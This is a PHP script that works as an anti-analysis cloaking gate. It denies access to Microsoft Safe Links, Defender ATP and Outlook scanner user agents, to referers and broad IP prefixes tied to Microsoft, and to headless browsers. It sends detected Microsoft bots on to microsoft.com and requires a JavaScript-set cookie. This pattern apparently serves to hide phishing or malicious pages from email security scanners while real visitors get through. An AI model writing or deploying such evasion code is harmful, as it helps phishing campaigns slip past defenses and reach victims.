<?php
// List of blocked domains and IPs (Microsoft scanners and Safe Links)
$blocked_domains = [
    'safelinks.protection.outlook.com',
    'eur03.safelinks.protection.outlook.com',
    'nam01.safelinks.protection.outlook.com',
    'apc01.safelinks.protection.outlook.com',
    'can01.safelinks.protection.outlook.com',
    'msappproxy.net',
    'msftconnecttest.com',
    'protection.office.com',
    'outlook.office365.com',
    'defender.microsoft.com',
    'edge.microsoft.com',
    'office365.com',
    'azureedge.net',
    'microsoftonline.com',
    'graph.microsoft.com',
    'cloudapp.net',
    'microsoft.com',
    'protection.office.com',
    'office365.com',
    'msecnd.net',
    'windows.net',
    'blob.core.windows.net'
];

// List of blocked user agents (Microsoft security bots)
$blocked_user_agents = [
    'BingPreview/1.0b',
    'Microsoft Office Word 2014',
    'Microsoft Office Excel 2016',
    'ExchangeServicesClient/0.0.0.0',
    'Microsoft Office Word 2021',
    'Microsoft-CryptoAPI',
    'Microsoft-Delivery-Optimization',
    'Microsoft NCSI',
    'DefenderATP',
    'Microsoft-ATP-SafeLinks',
    'Mozilla/5.0 (Windows NT; Microsoft Outlook 16.0; Outlook-Mail; Desktop app)',
    'Mozilla/5.0 (compatible; MSIE 11; Windows NT 10.0; Trident/7.0)'
];

// Function to log blocked requests
function log_blocked_attempt($reason) {
    $logfile = 'bot_block_log.txt';
    $log_entry = date('Y-m-d H:i:s') . " - Blocked: $reason - IP: " . $_SERVER['REMOTE_ADDR'] . " - User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\n";
    file_put_contents($logfile, $log_entry, FILE_APPEND);
}

// Check if the request comes from a blocked domain (referer check)
if (!empty($_SERVER['HTTP_REFERER'])) {
    foreach ($blocked_domains as $domain) {
        if (strpos($_SERVER['HTTP_REFERER'], $domain) !== false) {
            log_blocked_attempt("Blocked domain: $domain");
            header("HTTP/1.1 403 Forbidden");
            exit("Access Denied");
        }
    }
}

// Check if the request comes from a blocked user agent
if (!empty($_SERVER['HTTP_USER_AGENT'])) {
    foreach ($blocked_user_agents as $bot) {
        if (stripos($_SERVER['HTTP_USER_AGENT'], $bot) !== false) {
            log_blocked_attempt("Blocked User-Agent: $bot");
            header("HTTP/1.1 403 Forbidden");
            exit("Access Denied");
        }
    }
}

// Check if the request comes from a Microsoft-associated IP
$client_ip = $_SERVER['REMOTE_ADDR'];
$ip_ranges = [
    '20.', '40.', '52.', '104.', '131.', '132.', '137.', '138.', '157.', '191.', '207.', '212.'
];

foreach ($ip_ranges as $range) {
    if (strpos($client_ip, $range) === 0) {
        log_blocked_attempt("Blocked Microsoft IP: $client_ip");
        header("HTTP/1.1 403 Forbidden");
        exit("Access Denied");
    }
}

// Optional: Redirect detected bots to a harmless page
if (!empty($_SERVER['HTTP_USER_AGENT']) && stripos($_SERVER['HTTP_USER_AGENT'], 'Microsoft') !== false) {
    log_blocked_attempt("Redirected Microsoft bot");
    header("Location: https://www.microsoft.com/");
    exit();
}

// Block if js_challenge cookie is not set (must be set by JS)
if (empty($_COOKIE['js_challenge']) || $_COOKIE['js_challenge'] !== '1') {
    log_blocked_attempt("No JS challenge cookie");
    header("HTTP/1.1 403 Forbidden");
    exit("Access Denied");
}

// Advanced headless and bot detection
$ua = $_SERVER['HTTP_USER_AGENT'] ?? '';
if (stripos($ua, 'Headless') !== false || stripos($ua, 'PhantomJS') !== false || stripos($ua, 'Selenium') !== false || stripos($ua, 'Puppeteer') !== false) {
    log_blocked_attempt("Headless or automation detected");
    header("HTTP/1.1 403 Forbidden");
    exit("Access Denied");
}
?>
